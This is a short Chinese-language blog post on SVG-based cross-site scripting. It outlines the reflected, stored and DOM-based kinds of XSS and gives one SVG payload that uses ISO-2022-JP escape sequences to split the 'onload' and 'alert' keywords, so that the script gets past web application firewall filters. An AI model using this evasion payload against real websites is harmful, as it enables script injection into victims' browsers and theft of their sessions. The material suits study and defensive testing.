svg图片 xss payload | xss waf bypass

svg图片 xss payload | xss waf bypass

目录导航

原理

使用unicode字符绕过waf对关键字的检测。

跨站脚本(Cross-Site Scripting,简称 XSS)是一种常见的安全漏洞,它允许攻击者向Web页面中注入恶意脚本,然后在受害者浏览器中执行该脚本。这使得攻击者能够窃取用户的会话令牌、操纵Web页面、修改页内容、重定向用户、劫持用户输入等。
XSS漏洞的原理是攻击者通过输入某些特殊字符或代码片段,将恶意脚本注入到Web页面中,例如在评论框中输入,当页面被渲染时,这段脚本就会被执行,弹出“Hello World!”的提示框。
XSS漏洞可以分为三种类型:
1、反射型 XSS:攻击者将恶意脚本注入到URL中,然后将URL传递给受害者,当受害者点击该URL时,脚本将被执行。这种类型的XSS漏洞是最常见的。
2、存储型 XSS:攻击者将恶意脚本注入到Web应用程序的数据库或其他存储设备中,然后当用户访问被攻击的页面时,恶意脚本将被加载和执行。
3、DOM 型 XSS:攻击者利用客户端脚本,将恶意脚本注入到Web页面的DOM(文档对象模型)中,然后在受害者浏览器中执行该脚本。

svg xss payload

<?xml version="1.0" encoding="ISO-2022-JP"?>
<sv(Bg xmlns="http://www.w3.org/2000/svg" o(Bnlo(Bad="ale(Brt('ddosi.org')"/>

截图

svg图片 xss payload | xss waf bypass

转载请注明出处及链接

Leave a Reply

您的邮箱地址不会被公开。 必填项已用 * 标注